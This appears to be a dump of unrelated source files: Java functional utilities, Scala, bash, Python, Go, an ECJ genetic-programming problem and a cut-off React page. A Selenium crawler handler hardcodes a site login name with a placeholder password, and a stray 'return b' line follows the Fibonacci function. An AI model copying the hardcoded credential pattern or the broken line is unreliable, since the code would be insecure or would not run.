     * BinaryOperator<Maybe<Integer>> sumMaybes = Semigroups.combineScalarFunctors(Semigroups.intSum);
     * Maybe.just(1)
     *      .combine(sumMaybes, Maybe.just(5))
     *
     * //Maybe[6]
     * }
     * </pre>
     *
     * NOTE(review): the implementation is identical to {@link #combineZippables(BiFunction)};
     * the two names exist for readability at call sites.
     *
     * @param semigroup Semigroup to combine the values inside the Scalar Functors (Maybe, Xor, Ior, Try, Eva, FeatureToggle etc)
     * @return Combination of two Scalar Functors
     */
    static <T, A extends Zippable<T>> Semigroup<A> combineScalarFunctors(BiFunction<T, T, T> semigroup) {
        return (a, b) -> (A) a.zip(b,
                                   semigroup);
    }

    /**
     * @return Combination of two ReactiveSeq Streams b is appended to a
     */
    static <T> Semigroup<ReactiveSeq<T>> combineReactiveSeq() {
        return (a, b) -> a.appendStream(b);
    }

    /** @return Combination that yields a unless a is empty, in which case b */
    static <T> Semigroup<ReactiveSeq<T>> firstNonEmptyReactiveSeq() {
        return (a, b) -> a.onEmptySwitch(() -> b);
    }

    /** @return Combination that emits from whichever stream produces a value first */
    static <T> Semigroup<ReactiveSeq<T>> ambReactiveSeq() {
        return (a, b) -> (ReactiveSeq<T>) Semigroups.<T>amb().apply(a,
                                                                   b);
    }

    static <T> Semigroup<ReactiveSeq<T>> mergeLatestReactiveSeq() {
        return (a, b) -> Spouts.mergeLatest(a,
                                            b);
    }

    static <T> Semigroup<Publisher<T>> mergeLatest() {
        return (a, b) -> Spouts.mergeLatest(a,
                                            b);
    }

    static <T> Semigroup<Publisher<T>> amb() {
        return (a, b) -> Spouts.amb(a,
                                    b);
    }

    /** @return Combination that zips the two streams element-wise with s */
    static <T> Semigroup<ReactiveSeq<T>> zipReactiveSeq(Semigroup<T> s) {
        return (a, b) -> a.zip(s,
                               b);
    }

    /**
     * @return Combination of two Stream's : b is appended to a
     */
    static <T> Semigroup<Stream<T>> combineStream() {
        return (a, b) -> Stream.concat(a,
                                       b);
    }

    /**
     * @return Combination of two Collection, first non-empty is returned
     */
    static <T, C extends Collection<T>> Semigroup<C> firstNonEmpty() {
        return (a, b) -> a.isEmpty() ? b : a;
    }

    /**
     * @return Combination of two Collection, last non-empty is returned
     */
    static <T, C extends Collection<T>> Semigroup<C> lastNonEmpty() {
        return (a, b) -> b.isEmpty() ? a : b;
    }

    /**
     * @return Combination of two Objects of same type, first non-null is returned
     */
    static <T> Semigroup<T> firstNonNull() {
        return (a, b) -> a != null ? a : b;
    }

    /**
     * @return Combine two CompletableFuture's by taking the first to complete
     */
    static <T> Semigroup<CompletableFuture<T>> firstCompleteCompletableFuture() {
        return (a, b) -> (CompletableFuture<T>) CompletableFuture.anyOf(a,
                                                                        b);
    }

    /**
     * @return Combine two Future's by taking the first result
     */
    static <T> Semigroup<Future<T>> firstCompleteFuture() {
        return (a, b) -> Future.anyOf(a,
                                      b);
    }

    /** @return Combine two Futures by zipping their results element-wise with s */
    static <T> Semigroup<Future<T>> zippedFutures(Semigroup<T> s) {
        return (a, b) -> a.zip(s,
                               b);
    }

    /**
     * @return Combine two Future's by taking the first successful
     */
    static <T> Semigroup<Future<T>> firstSuccessfulFuture() {
        return (a, b) -> Future.firstSuccess(a,
                                             b);
    }

    /**
     * @return Combine two Eithers by taking the first right
     */
    static <ST, PT> Semigroup<Either<ST, PT>> firstRightEither() {
        return (a, b) -> a.isRight() ? a : b;
    }

    /**
     * @return Combine two Eithers by taking the first left
     */
    static <ST, PT> Semigroup<Either<ST, PT>> firstLeftEither() {
        return (a, b) -> a.isLeft() ? a : b;
    }

    /**
     * @return Combine two Eithers by taking the last right
     */
    static <ST, PT> Semigroup<Either<ST, PT>> lastRightEither() {
        return (a, b) -> b.isRight() ? b : a;
    }

    /**
     * @return Combine two Eithers by taking the last left
     */
    static <ST, PT> Semigroup<Either<ST, PT>> lastLeftEither() {
        return (a, b) -> b.isLeft() ? b : a;
    }

    /**
     * @return Combine two Try's by taking the first success
     */
    static <T, X extends Throwable> Semigroup<Try<T, X>> firstTrySuccess() {
        return (a, b) -> a.isSuccess() ? a : b;
    }

    /**
     * @return Combine two Try's by taking the first failure
     */
    static <T, X extends Throwable> Semigroup<Try<T, X>> firstTryFailure() {
        return (a, b) -> a.isFailure() ? a : b;
    }

    /**
     * @return Combine two Try's by taking the last success
     */
    static <T, X extends Throwable> Semigroup<Try<T, X>> lastTrySuccess() {
        return (a, b) -> b.isSuccess() ? b : a;
    }

    /**
     * @return Combine two Try's by taking the last failure
     */
    static <T, X extends Throwable> Semigroup<Try<T, X>> lastTryFailure() {
        return (a, b) -> b.isFailure() ? b : a;
    }

    /**
     * @return Combine two Ior's by taking the first right
     */
    static <ST, PT> Semigroup<Ior<ST, PT>> firstPrimaryIor() {
        return (a, b) -> a.isRight() ? a : b;
    }

    /**
     * @return Combine two Ior's by taking the first left
     */
    static <ST, PT> Semigroup<Ior<ST, PT>> firstSecondaryIor() {
        return (a, b) -> a.isLeft() ? a : b;
    }

    /**
     * @return Combine two Ior's by taking the last right
     */
    static <ST, PT> Semigroup<Ior<ST, PT>> lastPrimaryIor() {
        return (a, b) -> b.isRight() ? b : a;
    }

    /**
     * @return Combine two Ior's by taking the last left
     */
    static <ST, PT> Semigroup<Ior<ST, PT>> lastSecondaryIor() {
        return (a, b) -> b.isLeft() ? b : a;
    }

    /**
     * @return Combine two Maybe's by taking the first present
     */
    static <T> Semigroup<Maybe<T>> firstPresentMaybe() {
        return (a, b) -> a.isPresent() ? a : b;
    }

    /**
     * @return Combine two optionals by taking the first present
     */
    static <T> Semigroup<Optional<T>> firstPresentOptional() {
        return (a, b) -> a.isPresent() ? a : b;
    }

    /**
     * @return Combine two Maybes by taking the last present
     */
    static <T> Semigroup<Maybe<T>> lastPresentMaybe() {
        return (a, b) -> b.isPresent() ? b : a;
    }

    /**
     * @return Combine two optionals by taking the last present
     */
    static <T> Semigroup<Optional<T>> lastPresentOptional() {
        return (a, b) -> b.isPresent() ? b : a;
    }

    /**
     * @param joiner Separator in joined String
     * @return Combine two strings separated by the supplied joiner
     */
    static Semigroup<String> stringJoin(final String joiner) {
        return (a, b) -> a + joiner + b;
    }

    /**
     * @param joiner Separator in joined String
     * @return Combine two StringBuilders separated by the supplied joiner
     */
    static Semigroup<StringBuilder> stringBuilderJoin(final String joiner) {
        return (a, b) -> a.append(joiner)
                          .append(b);
    }

    /**
     * @param joiner Separator in joined String
     * @return Combine two StringBuffers separated by the supplied joiner
     */
    static Semigroup<StringBuffer> stringBufferJoin(final String joiner) {
        return (a, b) -> a.append(joiner)
                          .append(b);
    }

    /**
     * @return Combine two Comparables taking the lowest each time
     */
    static <T, T2 extends Comparable<T>> Semigroup<T2> minComparable() {
        return (a, b) -> a.compareTo((T) b) > 0 ? b : a;
    }

    /**
     * @return Combine two Comparables taking the highest each time
     */
    static <T, T2 extends Comparable<T>> Semigroup<T2> maxComparable() {
        return (a, b) -> a.compareTo((T) b) > 0 ? a : b;
    }

    /**
     * @return Combine two functions by composing them (a first, then b)
     */
    static <A> Semigroup<Function<A, A>> functionComposition() {
        return (a, b) -> a.andThen(b);
    }

    static <A> Semigroup<NaturalTransformation<A, A>> naturalTransformationComposition() {
        return (a, b) -> a.andThen(b);
    }
}
|
package com.peterpotts.gene
/** A codon: an ordered triplet of nucleobases. */
case class Codon(
    first: Nucleobase,
    second: Nucleobase,
    third: Nucleobase) {
  /** The three bases in positional order. */
  val toList = List(first, second, third)
}
/** Factory parsing a 3-character RNA sequence into a [[Codon]] of ribonucleosides.
  * Assumes `sequence` has at least 3 characters — TODO confirm callers validate length. */
object RNACodon {
  def apply(sequence: String) = Codon(
    first = Ribonucleoside(sequence.charAt(0)),
    second = Ribonucleoside(sequence.charAt(1)),
    third = Ribonucleoside(sequence.charAt(2)))
}
/** Factory parsing a 3-character DNA sequence into a [[Codon]] of deoxyribonucleosides.
  * Assumes `sequence` has at least 3 characters — TODO confirm callers validate length. */
object DNACodon {
  def apply(sequence: String) = Codon(
    first = Deoxyribonucleoside(sequence.charAt(0)),
    second = Deoxyribonucleoside(sequence.charAt(1)),
    third = Deoxyribonucleoside(sequence.charAt(2)))
}
|
#!/bin/bash
# Raspberry Pi provisioning script: updates apt, installs build/admin/bluetooth
# tooling, runs companion installers, updates the kernel, then reboots.
# check for root
if [ "$EUID" -ne 0 ]
  then echo "Please run as root"
  exit
fi
# NOTE(review): RETURN is captured but never used afterwards — confirm it can go.
RETURN=`pwd`
echo ""
echo "============================="
echo "|  Let's update some pkgs   |"
echo "============================="
echo ""
# update
apt-get update
apt-get -y upgrade
echo ""
echo "============================="
echo "|  Let's install some pkgs  |"
echo "============================="
echo ""
# programming
apt-get -y install cmake pkg-config build-essential git swig
# misc
apt-get -y install i2c-tools
# admin
apt-get -y install nmap htop samba samba-common-bin arp-scan wget curl
apt-get -y install wavemon libpcap0.8-dev
# linux kernel
apt-get -y install raspi-config rpi-update
# moved to install-python.sh
# numpy
# need atlas | blas | f2py | fortran
# apt-get -y install libatlas-base-dev gfortran
#
# python3
# apt-get -y install libmpdec2
# apt-get -y install python3
# bluetooth
apt-get -y install bluez libusb-dev libdbus-1-dev libglib2.0-dev libudev-dev libical-dev libreadline-dev
# ascii art
apt-get -y install jp2a figlet
# python package lxml is a BITCH ... it NEVER updates nicely, so you need these
# http://lxml.de/installation.html
apt-get -y install libxml2-dev libxslt-dev python-dev
# node - this ONLY works on RPi 3 (ARMv7) ... it will warn you if ARMv6
# NOTE(review): these relative paths require running the script from its own
# directory — confirm, or invoke via "$(dirname "$0")".
./install-node.sh
./install-archeyjs.sh
# python 2/3
#./install-python.sh
# update kernel
rpi-update
# fix permissions
# NOTE(review): assumes the default 'pi' user exists — verify on custom images.
chown -R pi:pi /usr/local
echo ""
echo "============================="
echo "|  Done !!!  :)             |"
echo "|                           |"
echo "|  Rebooting NOW !!!!!!!!   |"
echo "============================="
echo ""
# Unconditional reboot: save work before running this script.
reboot now
|
import pygame

pygame.init()

# Window: a 640x480 camera frame plus a strip underneath for telemetry text.
size = (640, 660)
# DOUBLEBUF pairs with the display.flip() call in display_data().
screen = pygame.display.set_mode(size, pygame.DOUBLEBUF)
pygame.display.set_caption("Self-Driving Data Viewer")
def display_data(camera_image, steering_angle):
    """Draw one camera frame plus a steering-angle caption and present it.

    Blits onto the module-level ``screen`` surface; the frame becomes visible
    via a single buffer flip at the end.
    """
    frame = pygame.surface.Surface((640, 480), 0, 24).convert()
    frame.blit(camera_image, (0, 0))
    caption = pygame.font.Font(None, 36).render(
        f"Steering Angle: {steering_angle}", True, (255, 255, 255)
    )
    screen.blit(frame, (0, 0))
    screen.blit(caption, (10, 500))
    pygame.display.flip()
# Pump the event queue until the window is closed, then shut pygame down.
active = True
while active:
    if any(event.type == pygame.QUIT for event in pygame.event.get()):
        active = False
pygame.quit()
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package gov.nasa.jpl.memex.nutch.protocol.selenium.handlers.login;
import org.apache.nutch.protocol.interactiveselenium.InteractiveSeleniumHandler;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.By;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.support.ui.WebDriverWait;
import org.openqa.selenium.support.ui.ExpectedCondition;
import org.openqa.selenium.JavascriptExecutor;
public class LoginHandler3 implements InteractiveSeleniumHandler {

    private static final String USERNAME = "junpengl_usc";
    private static final String PASSWORD = "<PASSWORD>";
    private static final String PROCESS_URL = "www.theoutdoorstrader.com/members";

    /** Fill in and submit the login form, then wait for pending AJAX calls to settle. */
    public void processDriver(WebDriver driver) {
        try {
            WebElement loginField = driver.findElement(By.name("login"));
            loginField.sendKeys(USERNAME);

            WebElement passwordField = driver.findElement(By.name("password"));
            passwordField.sendKeys(PASSWORD);

            WebElement rememberBox = driver.findElement(By.name("remember"));
            rememberBox.click();

            // Submitting any element of the form submits the enclosing form.
            loginField.submit();

            // Block (up to 5s) until jQuery reports no active AJAX requests.
            new WebDriverWait(driver, 5).until(new ExpectedCondition<Boolean>() {
                public Boolean apply(WebDriver d) {
                    return (Boolean) ((JavascriptExecutor) d).executeScript("return jQuery.active == 0");
                }
            });
        } catch (Exception e) {
            System.out.println(e.toString());
        }
    }

    /** Only handle URLs under the members area of the target site. */
    public boolean shouldProcessURL(String URL) {
        return URL.contains(PROCESS_URL);
    }
}
|
<gh_stars>1-10
const router = require("express").Router();
const { Project, User } = require("../../models");
const withAuth = require("../../utils/auth");
// Create a project (requires an authenticated session)
router.post("/", withAuth, async (req, res) => {
  try {
    const newProject = await Project.create({
      ...req.body,
      user_id: req.session.user_id,
    });
    res.status(200).json(newProject);
  } catch (err) {
    res.status(400).json(err);
  }
});

// List all projects together with their owner's name/email.
// BUG FIX: `User` was referenced here but never required; it is now imported
// from ../../models. Also adds the error handling the other routes already have.
router.get("/projects", async (req, res) => {
  try {
    const data = await Project.findAll({
      include: [
        {
          model: User,
          attributes: ["name", "email"],
        },
      ],
    });
    res.json(data);
  } catch (err) {
    res.status(500).json(err);
  }
});

// Update a project
// NOTE(review): unlike POST/DELETE this route is not guarded by withAuth; with
// no session, req.session.user_id is undefined and nothing matches — confirm intended.
router.put("/:id", async (req, res) => {
  try {
    const projectData = await Project.update(req.body, {
      where: {
        id: req.params.id,
        user_id: req.session.user_id,
      },
    });
    // BUG FIX: Sequelize update() resolves to [affectedCount]; the array itself
    // is always truthy, so the old `!projectData` check could never fire.
    if (!projectData[0]) {
      res.status(400).json({ message: "No project found with that id." });
    } else {
      res.status(200).json([{ message: "project updated" }, projectData[0]]);
    }
  } catch (err) {
    res.status(400).json(err);
  }
});

// Delete a project (requires an authenticated session)
router.delete("/:id", withAuth, async (req, res) => {
  try {
    const projectData = await Project.destroy({
      where: {
        id: req.params.id,
        user_id: req.session.user_id,
      },
    });
    if (!projectData) {
      res.status(400).json({ message: "No project found with that id." });
      return;
    }
    res.status(200).json(projectData);
  } catch (err) {
    res.status(500).json(err);
  }
});

module.exports = router;
|
def gen_fib(n):
    """Return the n-th Fibonacci number (0-indexed: fib(0)=0, fib(1)=1).

    Args:
        n: non-negative index into the Fibonacci sequence.

    Returns:
        The n-th Fibonacci number.

    Raises:
        ValueError: if n is negative (previously returned a meaningless 1).
    """
    if n < 0:
        raise ValueError("n must be non-negative")
    a, b = 0, 1
    if n == 0:
        return a
    # BUG FIX: the loop previously ran over range(2, n), stopping one step
    # short and returning fib(n-1) for every n >= 3.
    for _ in range(2, n + 1):
        a, b = b, a + b
    return b
return b |
<reponame>fangfang-zhang/MTGP<gh_stars>0
/*
Copyright 2006 by <NAME>
Licensed under the Academic Free License version 3.0
See the file "LICENSE" for more information
*/
package ec.app.ant;
import ec.app.ant.func.*;
import ec.util.*;
import ec.*;
import ec.gp.*;
import ec.gp.koza.*;
import java.io.*;
import java.util.*;
import ec.simple.*;
/*
* Ant.java
*
* Created: Mon Nov 1 15:46:19 1999
* By: <NAME>
*/
/**
* Ant implements the Artificial Ant problem.
*
<p><b>Parameters</b><br>
<table>
<tr><td valign=top><i>base</i>.<tt>data</tt><br>
<font size=-1>classname, inherits or == ec.gp.GPData</font></td>
<td valign=top>(the class for the prototypical GPData object for the Ant problem)</td></tr>
<tr><td valign=top><i>base</i>.<tt>file</tt><br>
<font size=-1>String</font></td>
<td valign=top>(filename of the .trl file for the Ant problem)</td></tr>
<tr><td valign=top><i>base</i>.<tt>turns</tt><br>
<font size=-1>int >= 1</td>
<td valign=top>(maximal number of moves the ant may make)</td></tr>
</table>
<p><b>Parameter bases</b><br>
<table>
<tr><td valign=top><i>base</i>.<tt>data</tt></td>
<td>species (the GPData object)</td></tr>
</table>
*
* @author <NAME>
* @version 1.0
*/
public class Ant extends GPProblem implements SimpleProblemForm
    {
    public static final String P_FILE = "file";
    public static final String P_MOVES = "moves";

    // map point descriptions
    public static final int ERROR = 0;
    public static final int FOOD = -1;
    public static final int EMPTY = 1;
    public static final int TRAIL = 2;
    public static final int ATE = 3;

    // orientations
    public static final int O_UP = 0;
    public static final int O_LEFT = 1;
    public static final int O_DOWN = 2;
    public static final int O_RIGHT = 3;

    // maximum number of moves
    public int maxMoves;

    // how much food we have
    public int food;

    // our map
    public int map[][];

    // store the positions of food so we can reset our map
    // don't need to be deep-cloned, they're read-only
    public int foodx[];
    public int foody[];

    // map[][]'s bounds
    public int maxx;
    public int maxy;

    // our position
    public int posx;
    public int posy;

    // how many points we've gotten
    public int sum;

    // our orientation
    public int orientation;

    // how many moves we've made
    public int moves;

    // print modulo for doing the abcdefg.... thing at print-time
    public int pmod;

    /** Deep-clones the mutable trail map; foodx/foody are shared (read-only). */
    public Object clone()
        {
        Ant myobj = (Ant) (super.clone());
        myobj.map = new int[map.length][];
        for(int x=0;x<map.length;x++)
            myobj.map[x] = (int[])(map[x].clone());
        return myobj;
        }

    /** Reads the move budget and the .trl trail file, building map[][] and
     *  recording every food position so evaluate() can reset the map. */
    public void setup(final EvolutionState state,
        final Parameter base)
        {
        // very important, remember this
        super.setup(state,base);

        // No need to verify the GPData object

        // not using any default base -- it's not safe

        // how many maxMoves?
        maxMoves = state.parameters.getInt(base.push(P_MOVES),null,1);
        if (maxMoves==0)
            state.output.error("The number of moves an ant has to make must be >0");

        // load our file
        //File filename = state.parameters.getFile(base.push(P_FILE),null);
        //if (filename==null)
        //    state.output.fatal("Ant trail file name not provided.");

        InputStream str = state.parameters.getResource(base.push(P_FILE), null);
        if (str == null)
            state.output.fatal("Error loading file or resource", base.push(P_FILE), null);

        food = 0;

        LineNumberReader lnr = null;
        try
            {
            lnr =
                //new LineNumberReader(new FileReader(filename));
                new LineNumberReader(new InputStreamReader(str));

            // First line holds the grid dimensions: "<maxx> <maxy>".
            StringTokenizer st = new StringTokenizer(lnr.readLine()); // ugh
            maxx = Integer.parseInt(st.nextToken());
            maxy = Integer.parseInt(st.nextToken());
            map = new int[maxx][maxy];
            int y;
            for(y=0;y<maxy;y++)
                {
                String s = lnr.readLine();
                if (s==null)
                    {
                    state.output.warning("Ant trail file ended prematurely");
                    break;
                    }
                int x;
                for(x=0;x<s.length();x++)
                    {
                    // ' ' = empty, '#' = food pellet, '.' = trail marker
                    if (s.charAt(x)==' ')
                        map[x][y]=EMPTY;
                    else if (s.charAt(x)=='#')
                        { map[x][y]=FOOD; food++; }
                    else if (s.charAt(x)=='.')
                        map[x][y]=TRAIL;
                    else state.output.error("Bad character '" + s.charAt(x) + "' on line number " + lnr.getLineNumber() + " of the Ant trail file.");
                    }
                // fill out rest of X's
                for(int z=x;z<maxx;z++)
                    map[z][y]=EMPTY;
                }
            // fill out rest of Y's
            for (int z=y;z<maxy;z++)
                for(int x=0;x<maxx;x++)
                    map[x][z]=EMPTY;
            }
        catch (NumberFormatException e)
            {
            state.output.fatal("The Ant trail file does not begin with x and y integer values.");
            }
        catch (IOException e)
            {
            state.output.fatal("The Ant trail file could not be read due to an IOException:\n" + e);
            }
        finally
            {
            try { if (lnr != null) lnr.close(); } catch (IOException e) { }
            }
        state.output.exitIfErrors();

        // load foodx and foody reset arrays
        foodx = new int[food];
        foody = new int[food];
        int tmpf = 0;
        for(int x=0;x<map.length;x++)
            for(int y=0;y<map[0].length;y++)
                if (map[x][y]==FOOD)
                    { foodx[tmpf] = x; foody[tmpf] = y; tmpf++; }
        }

    /** Runs the individual's tree repeatedly (each eval consumes moves via the
     *  ant function set) until the move budget is spent or all food is eaten;
     *  standardized fitness is the amount of food left uneaten. */
    public void evaluate(final EvolutionState state,
        final Individual ind,
        final int subpopulation,
        final int threadnum)
        {
        if (!ind.evaluated)  // don't bother reevaluating
            {
            sum = 0;
            posx = 0;
            posy = 0;
            orientation = O_RIGHT;

            for(moves=0;moves<maxMoves && sum<food; )
                ((GPIndividual)ind).trees[0].child.eval(
                    state,threadnum,input,stack,((GPIndividual)ind),this);

            // the fitness better be KozaFitness!
            KozaFitness f = ((KozaFitness)ind.fitness);
            f.setStandardizedFitness(state,(food - sum));
            f.hits = sum;
            ind.evaluated = true;

            // clean up array: restore every eaten pellet for the next evaluation
            for(int y=0;y<food;y++)
                map[foodx[y]][foody[y]] = FOOD;
            }
        }

    /** Re-runs the individual on a scratch copy of the map, marking each
     *  visited cell with successive letters, and prints the annotated map. */
    public void describe(
        final EvolutionState state,
        final Individual ind,
        final int subpopulation,
        final int threadnum,
        final int log)
        {
        state.output.println("\n\nBest Individual's Map\n=====================", log);

        sum = 0;
        pmod = 97; // ASCII 'a': visited cells are stamped a, b, c, ...
        posx = 0;
        posy = 0;
        orientation = O_RIGHT;

        int[][] map2 = new int[map.length][];
        for(int x=0;x<map.length;x++)
            map2[x] = (int[])(map[x].clone());

        map2[posx][posy] = pmod; pmod++;
        for(moves=0; moves<maxMoves && sum<food; )
            ((EvalPrint)(((GPIndividual)ind).trees[0].child)).evalPrint(
                state,threadnum,input,stack,((GPIndividual)ind),this,
                map2);
        // print out the map
        // NOTE(review): both loops run over map2.length (the x bound); for a
        // non-square trail the y bound would be map2[0].length — confirm.
        for(int y=0;y<map2.length;y++)
            {
            for(int x=0;x<map2.length;x++)
                {
                switch(map2[x][y])
                    {
                    case FOOD:
                        state.output.print("#",log);
                        break;
                    case EMPTY:
                        state.output.print(".",log);
                        break;
                    case TRAIL:
                        state.output.print("+",log);
                        break;
                    case ATE:
                        state.output.print("?",log);
                        break;
                    default:
                        state.output.print(""+((char)map2[x][y]),log);
                        break;
                    }
                }
            state.output.println("",log);
            }
        }

    /** No objective normalization for this problem. */
    @Override
    public void normObjective(EvolutionState state, Individual ind, int subpopulation, int threadnum) {
        // TODO Auto-generated method stub

    }
    }
|
package pearson_test
import (
"bytes"
"encoding/binary"
"hash"
"io"
"math/rand"
"testing"
"github.com/nfisher/gstream/hash/pearson"
)
// Test_sum feeds table-driven inputs through the Pearson 64-bit hash and
// compares each little-endian sum against its known vector.
func Test_sum(t *testing.T) {
	cases := map[string]struct {
		hash.Hash64
		in  string
		out uint64
	}{
		"string input": {h(), "Hello world!!!", binary.LittleEndian.Uint64([]byte{85, 241, 106, 61, 154, 39, 190, 155})},
		"empty input":  {h(), "", binary.LittleEndian.Uint64([]byte{0, 0, 0, 0, 0, 0, 0, 0})},
	}

	for name, tc := range cases {
		t.Run(name, func(t *testing.T) {
			// The embedded Hash64 makes the case struct an io.Writer.
			io.Copy(tc, bytes.NewBufferString(tc.in))
			if got := tc.Sum64(); got != tc.out {
				t.Errorf("got sum = %v, want %v", got, tc.out)
			}
		})
	}
}
// h constructs a fresh 64-bit Pearson hash for a single test case.
// NOTE(review): rand.Seed seeds the global math/rand source, but nothing
// in this file visibly consumes it — confirm pearson.New64 depends on it;
// also note rand.Seed is deprecated as of Go 1.20.
func h() hash.Hash64 {
	rand.Seed(12345)
	return pearson.New64()
}
|
def maxmin(arr):
    """Return a tuple ``(maximum, minimum)`` of the values in *arr*.

    Args:
        arr: A non-empty sequence of mutually comparable values.

    Returns:
        tuple: ``(largest, smallest)`` element of ``arr``.

    Raises:
        ValueError: If ``arr`` is empty (the original raised a less
            descriptive ``IndexError`` from ``arr[0]``).
    """
    if not arr:
        raise ValueError("maxmin() arg is an empty sequence")
    # Track both extremes in a single pass; avoid shadowing the built-in
    # max()/min() names as the original did.
    largest = smallest = arr[0]
    for num in arr:
        if num > largest:
            largest = num
        if num < smallest:
            smallest = num
    return largest, smallest
# Demo: report the extremes of a sample list.
values = [1, 8, 5, 4, 10, 9]
extremes = maxmin(values)
print("Maximum value:", extremes[0])
print("Minimum value:", extremes[1])
<reponame>TheShahriyar/revson-gatsby
import React from "react"
import Img9 from "../images/others/img-9.jpg"
import Img5 from "../images/others/img-9.jpg"
import Img4 from "../images/others/img-9.jpg"
import Img2 from "../images/others/img-2.jpg"
import Portfolio1 from "../images/portfolio/port1.jpg"
import Portfolio2 from "../images/portfolio/port2.jpg"
import Portfolio3 from "../images/portfolio/port3.jpg"
import Portfolio4 from "../images/portfolio/port4.jpg"
import Portfolio5 from "../images/portfolio/port5.jpg"
import Portfolio6 from "../images/portfolio/port6.jpg"
import TeamImg3 from "../images/team/3.png"
import TeamImg6 from "../images/team/6.png"
import TeamImg5 from "../images/team/5.png"
import NewsImg1 from "../images/latest-blog/latest-blog-1.jpg"
import NewsImg2 from "../images/latest-blog/latest-blog-2.jpg"
import NewsImg3 from "../images/latest-blog/latest-blog-3.jpg"
import {
FaDropbox,
FaGlobeAsia,
FaPlaneDeparture,
FaTruckMoving,
FaRegHandLizard,
FaUserSecret,
} from "react-icons/fa"
import HeaderStyle1 from "../components/Header/HeaderStyle1"
import BootstrapSlider from "../components/Slideshow/BootstrapSlider"
import CallToAction2 from "../components/CallToAction/CallToAction2"
import FeatureStyle6 from "../components/Features/FeatureStyle6"
import SectionTitle from "../components/SectionTitle/SectionTitle"
import FeatureStyle7 from "../components/Features/FeatureStyle7"
import TeamStyle4 from "../components/Team/TeamStyle4"
import Clients from "../components/Clients"
import FooterStyle1 from "../components/Footer/FooterStyle1"
import Testimonial from "../components/Testimonial"
const Homepage4 = () => {
return (
<>
<HeaderStyle1 />
<BootstrapSlider />
<CallToAction2 bgColor="#ed1c24" btnSTyle="black" paddingClass="pad50" />
{/* Start Welcome Section */}
<section className="pad-t80 pad-b50">
<div className="container">
<div className="row">
<div className="col-md-4">
<FeatureStyle6
image={Img9}
title="Praesent sapien massa"
text="Donec sollicitudin molestie malesua. Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Donec sollicitudin molestie malesuada."
/>
</div>
<div className="col-md-4">
<FeatureStyle6
image={Img5}
title="Convallis pellentes nec"
text="Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Donec rutrum congue malesuada. Vestibulum ac diam sit amet quam vehicula elementum sed sit amet dui."
/>
</div>
<div className="col-md-4">
<FeatureStyle6
image={Img4}
title="Donec sollicitudin molestie"
text="Donec sollicitudin molestie malesua. Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Donec sollicitudin molestie malesuada."
/>
</div>
</div>
</div>
</section>
{/* End Welcome Section */}
{/* Start About Us Section */}
<section className="pad80" style={{ backgroundColor: "#f3f3f3" }}>
<div className="container">
<div className="row">
<div className="col-md-7">
<SectionTitle
titleStyle="left"
title="ABOUT US AND OUR PRIORITIES"
/>
<p>
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do
eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut
enim ad minim veniam, quis nostrud exercitation ullamco laboris
nisi ut aliquip ex ea commodo consequat.
</p>
<div className="row mbl-margin-bottom">
<div className="col-md-6">
<FeatureStyle7
icon={<FaDropbox />}
title="Packaging"
subtitle="We package & store"
/>
</div>
<div className="col-md-6">
<FeatureStyle7
icon={<FaGlobeAsia />}
title="Worldwide"
subtitle="Everywhere"
/>
</div>
<div className="col-md-6">
<FeatureStyle7
icon={<FaPlaneDeparture />}
title="Plane"
subtitle="Faster With Plane"
/>
</div>
<div className="col-md-6">
<FeatureStyle7
icon={<FaTruckMoving />}
title="Transporting"
subtitle="We Fast Transport"
/>
</div>
<div className="col-md-6">
<FeatureStyle7
icon={<FaRegHandLizard />}
title="Hand to Hand"
subtitle="Secure Transport"
/>
</div>
<div className="col-md-6">
<FeatureStyle7
icon={<FaUserSecret />}
title="Secure"
subtitle="We Gurantee"
/>
</div>
</div>
</div>
<div className="col-md-5">
<img src={Img2} alt="" className="w-100" />
<h4
style={{
marginTop: "30px",
marginBottom: "15px",
fontSize: "18px",
}}
>
Who We Are
</h4>
<p>
Proin eget tortor risus. Donec sollicitudin molestie malesuada.
Quisque velit nisi, pretium ut lacinia in, elementum id enim.
Quisque velit nisi, pretium ut lacinia in, elementum id enim.
Vestibulum ante ipsum primis in faucibus orci luctus et ultrices
posuere cubilia Curae.
</p>
</div>
</div>
</div>
</section>
{/* End About Us Section */}
{/* Start Portfolio Section */}
<section className="pad-t80 pad-b50">
<div className="container">
<div className="row">
<div className="col-md-12">
<SectionTitle title="Our Gallery" />
</div>
</div>
<div className="row portfolio-box">
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
<img src={Portfolio1} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
<img src={Portfolio2} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
<img src={Portfolio3} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
<img src={Portfolio4} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
<img src={Portfolio5} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
<div className="col-md-4 col-sm-6">
<div className="portfolio-post mb30">
